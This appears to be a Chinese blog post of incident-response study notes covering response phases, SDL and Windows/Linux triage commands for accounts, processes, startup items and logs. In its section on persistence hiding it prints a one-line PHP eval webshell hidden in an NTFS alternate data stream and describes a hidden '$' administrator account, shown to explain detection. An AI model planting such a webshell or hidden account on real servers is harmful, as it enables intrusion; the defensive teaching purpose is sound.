应急响应

应急响应
字数统计: 7.7k   |   阅读时长≈ 29 分钟

1.应急响应是什么

指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全。主要是为了人们对网络安全有所认识、有所准备,以便在遇到突发网络安全事件时做到有序应对、妥善处理。

2.PDCERF(6阶段)

  1. 准备阶段:预防,扫描、风险分析、补丁;制定可以实现应急响应目标的策略和规程,建立能够集合起来处理突发事件的体系。

    准备用来检测的工具和人,比如说ls、losf、ss、ifconfig这些东西

  2. 检测阶段:检测事件是已经发生的还是正在进行中的;找出事件产生原因,确定事件性质和严重性、预计修复时采用的专用资源

    紧急事件监测:包括防火墙、系统、web服务器、IDS/WAF/SIEM中的日志,不正常或者是执行了越权操作的用户,甚至还有管理员的报告(可以是邮件也可以电话短信什么的你可以看到听到的东西),我们要从这些数据中判断出受灾面积和攻击者入侵的点

  3. 抑制阶段:限制被破坏的范围。策略:完全关闭所有系统;从网络上断开主机或断开网络部分;修改所有防火墙和路由器过滤规则;封锁或删除被攻击的登录账号;加强对系统和网络行为的监控;设置诱饵服务器进一步获取事件信息;关闭受攻击的系统或其它相关系统的部分服务。

  4. 根除阶段::通过事件分析找出根源并彻底根除,以避免攻击者再次使用相同的手段攻击系统。

  5. 恢复阶段:把被破坏的信息彻底恢复到正常运作状态。

  6. 攻击跟踪:据各种监控去确定没有其他的攻击行为和攻击向量,紧接着就是开会反省此次事件,写报告,持续改进工作流程和工作缓解

3.评价安全标准

评价企业安全建设做的好与坏的标准就是ROI(投资回报率),即攻击者攻击的成本是10元,你去防御这个攻击的成本是1毛,说明这个安全建设是有效的。

4.SDL

security development lifecycle,即安全开发生命周期。

目的:从安全漏洞产生的根源上解决应用安全问题,通过对软件开发流程的控制,保证产品的安全性。

SDL是全面软件生命周期管理与最佳实践手段和工具相结合的产物,使用SDL方式可有效提升系统的安全等级,并将安全工作提升到可进行标准化实施的程度。微软的SDL理论基于三个核心概念开展:培训、持续的安全问题改进和问责制。SDL的目标是减少应用软件的漏洞数量级和严重程度,其完整生命周期主要阶段

SDL的第一步就是安全培训。

安全培训内容

Part 1:安全设计:包括减小攻击面、深度防御、最小权限原则、服务器安全配置等
Part 2:威胁建模:概述、设计意义、基于威胁建模的编码约束
Part 3:安全编码:缓冲区溢出(针对C/C++)、整数算法错误(针对C/C++)、XSS/CSRF(对于Web类应用)、SQL注入(对于Web类应用)、弱加密
Part 4:安全测试:安全测试和黑盒测试的区别、风险评估、安全测试方法(代码审计、fuzz等)
Part 5:隐私与敏感数据:敏感数据类型、风险评估、隐私开发和测试的最佳实践
Part 6:高级概念:高级安全概念、可信用户界面设计、安全漏洞细节、自定义威胁缓解

完整周期主要阶段

windows入侵排查

1.检查系统账号安全

1.查看服务器是否有弱口令、远程管理端口是否对公网开放

根据实际情况咨询相关服务器管理员

2.检查服务器是否存在可疑账号、新增账号

打开cmd窗口,输入lusrmgr.msc命令,查看是否有可疑或者新增的账号,若存在管理员Administrators群组内新增的账户,请立即禁用或者删除

3.查看服务器注册表是否存在隐藏账号、克隆账号

打开注册表–regedit.exe或者regedit,查看管理员对应键值

4.结合日志,查看管理员登陆时间、用户名是否存在异常

使用命令提示符,输入eventvwr.msc,打开事件查看器

导出windows日志–安全,利用微软官方工具 Log Parser进行分析

2.检查异常端口、进程

1.检查端口连接情况,是否有远程连接或者可疑连接

使用netstat -ano命令查看当前的网络连接,查找可疑的ESTABLISHED

1
netstat -ano | findstr ESTAB

根据netstat命令定位的PID编号,再通过tasklist命令进行进程定位

1
tasklist | findstr “PID”

QQPCRTP.exe 2548 Services 0 65,856 K
svchost.exe 12548 Services 0 10,436 K

2.进程

命令提示符输入msinfo32,点击软件环境–正在运行任务,查看进程的详细信息

使用D盾或者火绒剑查杀工具,关注没有签名信息的进程

通过微软官方提供的Process Explorer等工具进行排查

对于进程和子进程,主要关注:

没有签名验证信息的进程

没有描述信息的进程

进程的属主

进程的路径是否合法

cpu或者内存资源占用长时间过高的进程

查看端口对应的PID:

1
netstat -ano | findstr “PORT”

netstat -ano | findstr 445

查看进程对应的PID:任务管理器—-查看—-选择列—PID:

然后

1
tasklist | findstr “PID”

查看进程对应的程序位置:

任务管理器–选择对应进程–右键打开文件位置

或者命令行:命令提示符输入wmic,cmd界面输入process

查看Windows服务所对应的端口:

%systemroot%/system32/drivers/etc/services(一般 %systemroot% 就是 C:\Windows 路径)

3.检查启动项、计划任务、服务

3.1.检查服务器是否有异常的启动项

  1. 登录服务器(默认情况下此目录在是一个空目录,确认是否有非业务程序在该目录下)

    系统启动文件夹:c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

    或者:

    在文件资源管理器上方直接输入:shell:Common Startup

    用户启动文件夹:c:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

    或者

    …shell:startup

  2. 单击开始菜单 >【运行 】,输入 msconfig,查看是否存在命名异常的启动项目,是则取消勾选命名异常的启动项目,并到命令中显示的路径删除文件。

  3. 单击【开始】>【运行】,输入 regedit,打开注册表,查看开机启动项是否正常,特别注意如下三个注册表项:

    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\run
    • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce
    • 检查右侧是否有启动异常的项目,如有请删除,并建议安装杀毒软件进行病毒查杀,清除残留病毒或木马

  4. 利用安全软件查看启动项、开机时间管理等。

  5. 组策略,运行 gpedit.msc

3.2 检查计划任务

  1. 单击【开始】>【设置】>【控制面板】>【任务计划】,查看计划任务属性,可以可以发现木马文件的路径
  2. 单击【开始】>【运行】;输入 cmd,然后输入 at (如果弃用了,就用schtasks.exe),检查计算机与网络上的其它计算机之间的会话或计划任务,如有,则确认是否为正常连接。

3.3 服务自启动

单击【开始】>【运行】,输入 services.msc,注意服务状态和启动类型,检查是否有异常服务。

3.4 破除权限维持隐藏

3.4.1 利用文件属性

  • 简单的隐藏手段:就是文件右键属性,隐藏;

查看的话:文件资源管理器勾选显示隐藏文件即可

  • 高级点的:cmd中用:
1
2
attrib +s +a +h +r D:\1.txt
//把原本的文件夹增加了系统文件属性s、存档文件属性a、只读文件属性r和隐藏文件属性h

查看的话:打开电脑文件夹选项卡(文件资源管理器->文件->更改文件夹和搜索选项),取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件、文件夹和驱动器

3.4.2 利用ADS

隐藏原理:在服务器上echo一个数据流文件,index.php如果是正常的网页文件,可以在其中写入:

1
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的

解决方法:

  • 查看index.php:hidden.jsp内容,进入文件所在的目录,notepad index.php:hidden.jpg 或者 dir /r。
  • 删除index.php:hidden.jpg,之间删除index.php即可。

ps:

参考http://www.hzhcontrols.com/new-792761.html

3.4.3 驱动级文件隐藏

隐藏原理:通过软件,如Easy File Locker

解决方法:

先确认是否隐藏:

如果网站目录未查找到相关文件,且系统目录存在存在以下文件,那么应该是遭遇了驱动级文件隐藏

  • c:\WINDOWS\xlkfs.dat
  • c:\WINDOWS\xlkfs.dll
  • c:\WINDOWS\xlkfs.ini
  • c:\WINDOWS\system32\drivers\xlkfs.sys

清除:

在cmd下:

1、查询服务状态: sc qc xlkfs

2、停止服务: net stop xlkfs 服务停止以后,经驱动级隐藏的文件即可显现

3、删除服务: sc delete xlkfs

4、删除系统目录下面的文件,重启系统,确认服务已经被清理了

其它文件隐藏方式:装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系统文件很像的文件名并放在正常目录里面,很难辨别出来。而更多的恶意程序开始实现“无文件”攻击,这种方式极难被发现

3.4.4 隐藏账号

隐藏原理:window 隐藏系统用户操作,CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限

解决方法:

通过任务管理器查看是否存在用户名后接$的用户,存在则使用D盾_web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号

ps:

隐藏账户:https://blog.csdn.net/p36273/article/details/130775285

3.4.5 端口复用

隐藏原理:可以使用WinRM服务或者其他的工具实现端口复用

解决方法:

复用时会在安全日志中留下痕迹

3.4.6 进程注入

隐藏原理:是病毒木马的惯用手段,同时,它也是一种隐藏技术

解决方法:

1.通过TCPview显示已建立的TCP连接,我们可以看到异常的连接,同时,恶意软件将以绿色显示不到一秒钟,然后变成红色消失,如此循环。

2.利用process monitor或者火绒剑监控进程都可以定位到注入进程。

3.利用process monitor捕捉通信过程,有规律的请求取决于sleep设置的间隔

4.检查系统相关信息

4.1 查看系统版本以及补丁信息

检查方法:单击【开始】>【运行】,输入 systeminfo,查看系统信息

4.2 查看可疑目录文件

  1. 查看用户目录,新建账号会在这个目录生成一个用户目录,查看是否有新建用户目录
    1. Window 2003版本 C:\Documents and Settings
    2. Window 2008R2及以后版本 C:\Users\
  2. 单击【开始】>【运行】,输入 %UserProfile%\Recent,分析最近打开分析可疑文件
  3. 在服务器各个目录,可根据文件夹内文件列表时间进行排序,查找可疑文件
  4. 回收站、浏览器下载目录、浏览器历史记录
  5. 修改时间在创建时间之前的为可疑文件

4.3 找出同一时间范围内创建的文件

发现并得到 WebShell、远控木马的创建时间,如何找出同一时间范围内创建的文件

  • a、利用 Registry Workshop 注册表编辑器的搜索功能,可以找到最后写入时间区间的文件
  • b、利用计算机自带文件搜索功能,指定修改时间进行搜索

4.4 自动化查杀

  • 病毒查杀

    检查方法:下载安全软件,更新最新病毒库,进行全盘扫描

  • webshell查杀

    选择具体站点路径进行webshell查杀,建议使用两款WebShell 查杀工具同时查杀,可相互补充规则库的不足

5.日志分析

Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。

系统和应用程序日志存储着故障排除信息,对于系统管理员更为有用。 安全日志记录着事件审计信息,包括用户验证(登录、远 程访问等)和特定用户在认证后对系统做了什么,对于调查人员而言,更有帮助

分类如下:

  • 系统日志,记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。默认位置%SystemRoot%\System32\Winevt\Logs\System.evtx
  • 应用程序日志,包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志中记录文件错误,程序开发人员可以自行决定监视哪些事件。默认位置:%SystemRoot%\System32\Winevt\Logs\Application.evtx
  • 安全日志,记录系统的安全审计事件,包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。默认设置下,安全性日志是关闭的,管理员可以使用组策略来启动安全性日志,或者在注册表中设置审核策略,以便当安全性日志满后使系统停止响应。默认位置:%SystemRoot%\System32\Winevt\Logs\Security.evtx

ID说明:

  • 4624 登录成功
  • 4625 登录失败
  • 4634 注销成功
  • 4647 用户启动的注销
  • 4672 使用超级用户(管理员)进行登录
  • 4720 创建用户

Log Parser日志分析

https://www.cnblogs.com/-andrea/p/17452895.html

系统日志

  • a、前提:开启审核策略,若日后系统出现故障、安全事故则可以查看系统的日志文件,排除故障,追查入侵者的信息等。
  • b、Win+R 打开运行,输入 “eventvwr.msc”,回车运行,打开”事件查看器”。
  • c、导出应用程序日志、安全日志、系统日志,利用 LogParser 进行分析。

Web访问体质

  • a、找到中间件的web日志,打包到本地方便进行分析
  • b、推荐工具:Windows 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。
  • Linux 下,使用 Shell 命令组合查询分析

工具

病毒分析

病毒查杀

版、最新病毒库)

在线病毒扫描网站

病毒动态

webshell查杀

5.场景与处理流程

1.场景

勒索病毒、挖矿木马、Webshell、网页篡改、DDos攻击、数据泄露、流量劫持。

2.处理流程

事件类型

时间范围

系统排查

a.系统基本信息

windows

msinfo32:系统信息,显示本地计算机的硬件资源、组件和软件环境信息。正在运行任务、服务、系统驱动程序、加载的模块、启动程序等进行排查。
systeminfo:系统信息,主机名、操作系统版本等详细信息。

Linux

lscpu:CPU信息,型号、主频、内核等。

uname -a:操作系统信息

cat /proc/version:操作系统版本信息

lsmod:所有载入系统的模块信息

b.用户信息

windows

net user:查看用户账户信息(看不到以$结尾的隐藏用户)
net user username:查看用户名为username用户的详细信息; lusrmgr.msc:打开本地用户与组,可查看隐藏用户;
打开计算机管理-本地用户与组可查看隐藏用户;

wmic useraccount get name,sid:查看系统中的所有用户;
注册表查看是否存在克隆账户:regedit打开注册表,选择HKEY_LOCAL_MACHHINE下的SAM选项,为该项添加允许父项的继承权限传播到该对象和所有子对象。包括那些在此明确定义的目标和用在此显示的可以应用到子对象的项目替代所有子对象的权限项目权限,使当前用户拥有SAM的读取权限。添加之后F5刷新即可访问子项并查看用户信息。同时,在此项下导出所有00000开头的项,将所有导出的项与000001F4(对应Administrator用户)导出内容做比较,若其中的F值相同,则表示可能为克隆账户。

Linux

查看所有用户信息:cat /etc/passwd
后续各项由冒号隔开,分别表示用户名、密码加密、用户ID、用户组ID、注释、用户主目录、默认登录shell。最后显示bin/bash的,表示账户状态可登录,显示sbin/nologin的,不可登陆。

awk -F: ‘{if($3==0)print
$1}’ /etc/passwd :查询登录账户UID=0的账户,root是uid等于0的账户,如果出现其它的账户,就要重点排查;

查看可登录账户:cat /etc/passwd | grep ‘/bin/bash’

查看用户错误的登录信息:lastb(包括错误的登录方法、ip、时间等)

查看所有用户最后的登录信息:lastlog

查看用户最近登录信息:last

查看当前用户登录系统信息:who

查看空口令账户:awk -F: ‘length($2)==0 {print$1}’ /etc/shadow

c.启动项

是开机系统在前台或者后台运行的程序,是病毒等实现持久化驻留的常用方法。

Windows

msconfig:可查看启动项的详细信息;

注册表查看:

HKEY_CLASSES_ROOT:此处存储的信息可确保在windows资源管理器中执行时打开正确的程序。它还包含有关拖放规则、快捷方法和用户界面信息的更多详细信息;
HKEY_CURRENT_USER:包含当前登录系统的用户的配置信息,有用户的文件夹、屏幕颜色和控制面板设置;
HKEY_LOCAL_MACHINE:包含运行操作系统的硬件特定信息,有系统上安装的驱动器列表及已安装硬件和应用程序的通用配置;
HKEY_USERS:包含系统上所有用户的配置信息,有应用程序配置和可视配置;
HKEY_CURRENT_CONFIG:存储有关系统当前配置信息

查看注册表中的信息:reg query
“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”

Linux

cat /etc/init.d/rc.local cat /etc/rc.local ls -alt /etc/init.d
查看init.d文件夹下的所有文件的详细信息

d.任务计划

很多计算机都会自动加载“任务计划”,因此任务计划也是病毒实现持久化驻留的一种常用手段

Windows

eventvwr:打开事件查看器,可看日志
打开计算机管理——系统工具——任务计划程序——任务计划程序库:可查看任务计划的名称、状态、触发器等信息;
命令行输入schtasks:可获取任务计划信息,要求是本地Administrator组的成员;
在PowerShell下输入get-scheduledtask 可查看当前系统中所有任务计划信息,包括路径、名称、状态等详细信息。

Linux

crontab -l:可查看当前任务计划

crontab -u root -l:查看root用户的任务计划(指定用户)

查看etc目录下的任务计划文件:一般在linux系统中的任务计划文件是以cron开头的,可以利用正则表达式的筛选出etc目录下的所有以cron开头的文件,具体表达式为/etc/cron,例如查看etc目录下的所有任务计划文件就可以输入ls /etc/cron命令。
/etc/crontab
/etc/cron.d/
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab

e.其它

windows防火墙的入站规则和出站规则 :

netsh :

netsh firewall show state:显示当前防火墙的网络配置状态

netsh

进程排查

进程即,系统进行资源分配和调度的基本单位;

主机在感染恶意程序后,恶意程序都会启动相应的进程,来完成相关的恶意操作,有的恶意进程为了不被查杀,还会启动相应的守护进程来对恶意进程进行守护。

Windows

通过任务管理器查看;

命令行的话:

tasklist:可显示计算机中的所有进程,可查看进程的映像名称、PID、会话等信息;

tasklist /svc:可以显示每个进程和服务对应的情况;

tasklist /m:查询加载的DLL

tasklist /m wmiutils.dll:查询特定dll的调用情况

tasklist /svc /fi “pid eq 284”:过滤器功能,eq等于、nq不等于、gt大于、lt小于、ge大于等于、le小于等于

netstat:可显示网络连接的信息,包括活动的TCP连接、路由器和网络接口信息,是一个监控TCP/IP网络的工具。
端口定位程序:通过netstat定位处PID,然后用tasklist查看具体的程序,

例如:netstat -ano |findstr “3306”

定位出pid=6616: tasklist |find “6616”

netstat -anb 3306:端口快速定位程序,需要管理员权限;

powershell排查:对于有守护进程的进程,需要确认子父进程之间的关系
get-wmiobject win32_process | select
name,processid,parentprocessid,path
wmic命令查询:可对进程进行查询以csv格式来显示进程名称、父进程id、进程id

wmic process get
name,parentprocessid,processid(/format:csv),实验了一下,括号可以去掉,否则提示此级别开关异常

Linux

netstat:分析可以端口、分析可疑ip地址、可疑pid及程序进程;

(待验证:↓)

ls -alt /proc/PID:查看PID为600的进程可执行程序;

lsof -p PID:查看进程所打开的文件;

kill -9 PID:结束进程;
rm -rf filename :删除名为filename的文件;
如果root用户都无法删除相关文件,可能是因为该文件被加上了i属性,使用lsattr filename 查看文件属性,然后用chattr -i filename 可移除i属性,进而删除文件。也有因为进程存在守护进程而无法被删除,可先将进程挂起,查杀守护进程后,再返回将进程删除。

补充:chattr +i filename 加i属性。

查看隐藏进程:顺序执行以下三条命令
ps -ef | awk ‘{print}’|sort -n |uniq>1 ls /proc |sort -n |uniq>2
diff 1 2 top:可用于挖矿进程排查,显示占用率较高的进程。

服务排查

运行在后台的进程,服务可以在计算机启动时自动启动,也可暂停和重启,而且不显示任何用户界面,服务非常适合在服务器上使用,通常在为了不影响在同一天计算机上工作的其它用户,且需要长时间运行功能时使用。在应急响应中,服务作为一种运行在后台的进程,是恶意软件常用的驻留方法。

Windows

services.msc:打开服务窗口,查看所有的服务项,包括服务的名称、描述、状态等。

Linux

chkconfig –list:可查看系统运行的服务;
service –status-all:可查看所有服务的状态;

文件痕迹排查

排查思路:

  1. 对恶意软件常用的敏感路径进行排查;
  2. 在确定了应急响应事件的时间点后,对时间点前后的文件进行排查;
  3. 对带有特征的恶意软件进行排查,包括代码关键字或关键函数、文件权限特征。

Windows

敏感目录
各个盘下的temp(tmp)相关目录,有些恶意程序释放字体(即恶意程序运行时投放出的文件)一般会在程序中写好投放的路径,由于不同系统版本的路径有所差别,但临时文件的路径相对统一,因此在程序中写好的路径一般是临时路径;

查看浏览器历史记录、下载文件和cookie信息:攻击者可能会下载一些后续攻击工具;

查看用户Recent文件:存储最近运行文件的快捷方式,一般在windows中的路径为: C:\Document and
Settings\Administrator(系统用户名)\Recent C:\Document and Settings\Default
User\Recent
Prefetch:预读取文件夹,存放系统已经访问过的文件的读取信息,扩展名为pf,可加快系统启动进程,

启动:%systemroot%\prefetch amcache.hve:可查看应用程序执行路径、上次执行时间及sha1值。

启动:%systemroot%\appcompat\programs
时间点查找 forfiles 攻击者可能会对时间动手脚 webshell
D盾、HwsKill、WebshellKill等工具对目录下的文件进行规则查询,

Linux

敏感目录 /tmp、 /usr/bin、 /usr/sbin:经常作为恶意软件下载目录及相关文件被替换的目录;
~/.ssh、/etc/ssh:经常作为后门配置的路径

时间点查找 find:可对某一时间段内增加的文件进行查找;
stat:对文件的创建时间、修改时间、访问时间进行排查;

特殊文件
查找777权限的文件:find /tmp -perm 777

webshell查找
初筛:find /var/www/ -name “*.php”
工具:findWebshell、Scan_Webshell.py扫描排查

对系统命令进行排查
ls、ps可能被攻击者替换,

ls -alt /bin 查看命令目录中的系统命令的修改时间进行排查;
ls -alh /bin:查看相关文件大小,若明显偏大,则文件很可能被替换;

linux后门检测
工具:chkrootkit(出现infected说明有后门)、rkhunter 排查suid程序
find /-type f -perm -04000 -ls -uid 0 2 >/dev/null

日志分析

Windows:

在运行对话框中输入eventvwr,打开事件查看器窗口,可查看windows相关日志。

系统日志:%SystemRoot%\System32\Winevt\Logs\System.evtx 系统中的各个组件在运行中产生的各种事件

安全性日志:%SystemRoot%\System32\Winevt\Logs\security.evtx
记录各种安全相关的事件,登录操作、对系统文件进行创建、删除、更改等操作。

应用程序日志:%SystemRoot%\System32\Winevt\Logs\Application.evtx

日志常用事件id 4624:登陆成功 4625:登录失败

日志分析
日志筛选器进行分析
PowerShell分析 Get-WinEvent Get-WinEvent Security -InstanceId 4625:获取安全性日志下事件id为4625的所有日志信息。
使用工具

Linux

linux系统日志一般在/var/log/下

/var/log/wtmp:记录登录进入、退出、数据交换、关机和重启,及last

/var/log/cron:记录与定时任务相关的日志信息;

/var/log/message:记录系统启动后的信息和错误日志;

/var/log/apache2/access.log:记录apache的访问日志;

/var/log/auth.log:记录系统授权信息,包括用户登录和使用的权限机制等;

日志分析

其它日志
除了windows、linux系统日志分析外,还有Web日志、中间件日志、数据库日志、FTP日志等进行分析。

IIS日志
%systemdrive%\inetpub\logs\logfiles
%systemroot%\system32\logfiles\w3svc1

Apache日志
/var/log/httpd/access.log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd-access.log

Nginx日志
默认在/usr/local/nginx/logs目录下,access.log代表访问日志,error.log代表错误日志。若没在默认路径下,则可到nginx.conf配置文件中查找。

Tomcat日志 tomcat/log下 Vsftp日志
/var/log/messages 可通过编辑/etc/vsftp/vsftp.conf配置文件来启用单独的日志,启用后,可访问vsftp.log和xferlog。

Weblogic日志
有三种日志:access log、 server log 、 domain log。

数据库日志

        Oracle
            select * from v$logfile:查询日志命令,默认在$ORACLE/rdbms/log目录下,
            select * from v$sql:可查询之前使用的sql;
        Mysql
            默认路径:/var/log/mysql/
            可查看日志是否开启:show variables like 'general';
            开启日志:set global general_log = 'ON';
        Mssql
            一般无法查看,需要登录到SQL Server Management Studio,在管理——SQL Server日志 中查看。

内存分析

流量分析

威胁情报

得出结论

6.参考

网络安全应急响应(归纳)_003安全实验室的博客-CSDN博客

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2023-2025 是羽泪云诶
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~

支付宝
微信